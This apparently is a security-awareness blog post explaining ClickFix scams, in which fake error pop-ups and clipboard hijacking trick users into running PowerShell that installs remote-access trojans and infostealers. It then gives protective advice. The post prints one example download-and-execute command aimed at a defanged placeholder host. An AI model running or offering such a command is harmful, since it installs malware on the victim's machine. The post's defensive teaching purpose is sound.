The Latest Scam: “Fix Your PC” Pop-Ups That Install Malware
You’re browsing the web when suddenly a pop-up appears. “Critical system error! Press Win + R and paste this command to repair your computer.”
It sounds urgent. It looks legit. And that’s exactly why it’s dangerous.
Security researchers have uncovered a wave of attacks in 2025 where hackers trick users into running malicious commands themselves—no shady downloads or email attachments required. Instead, they hijack your clipboard and convince you to paste and execute malware disguised as a “quick fix.”
This technique, called ClickFix, has become a favorite for cybercriminals spreading remote access trojans (RATs) and password-stealing malware. Here’s what you need to know.
How the Scam Works
-
You Land on a Fake Error Page
-
Hackers create convincing fake pages mimicking services like DocuSign, Okta, or even Windows error alerts.
-
The message claims your system is corrupted and provides “instructions” to fix it.
-
-
Your Clipboard Gets Hijacked
-
Hidden JavaScript on the page silently replaces whatever you copied with a malicious command.
-
You think you’re pasting harmless text, but it’s actually a script that downloads malware.
-
-
You Run the Malware Yourself
-
The command often uses PowerShell to fetch and execute a malicious payload.
-
Once run, the malware silently installs itself—giving hackers access to your system.
-
Example of a Hidden Attack Command
powershell.exe -Command "Start-BitsTransfer -Source 'hxxps://fake-site.com/malware.exe' -Destination 'C:\Temp\update.exe'; Start-Process 'C:\Temp\update.exe'"
To the victim, it might just look like a system verification step. In reality, it’s a backdoor for malware.
The Malware Being Spread
Security firm Palo Alto Networks has linked ClickFix scams to three major threats:
1. NetSupport RAT Full Remote Control
-
Disguised as a “Java update” or “security patch.”
-
Once installed, hackers can remotely control your PC, steal files, and spy on your activity.
2. Latrodectus The Silent Data Thief
-
Often delivered through fake “browser verification” pages.
-
Steals saved passwords, cookies, and credit card details from browsers.
3. Lumma Stealer AutoIt-Based Infostealer
-
Spreads via typosquatted domains (like “d0cu-sign.com”).
-
Targets cryptocurrency wallets and banking logins.
Why This Scam is So Effective
✔ No Email Attachments = Harder to Detect
-
Traditional email filters can’t stop it because the attack happens in your browser.
✔ Preys on Urgency
-
“Your computer is at risk!” messages pressure users into acting fast.
✔ Bypasses Common Security Tools
-
Since the user runs the command themselves, some antivirus programs don’t flag it.
How to Protect Yourself
Never Run Random Commands: If a website tells you to paste something into PowerShell or Command Prompt, close it.
Check Your Clipboard Before Pasting: Paste into Notepad first to see what you’re actually running.
Use a Password Manager: Helps avoid theft of saved browser passwords.
Keep Software Updated: Many attacks exploit old vulnerabilities.
Final Warning: Stay Skeptical
Hackers are getting smarter, but their biggest weapon is still human trust. If something seems off it probably is.
Discover more from CyberAwareHub
Subscribe to get the latest posts sent to your email.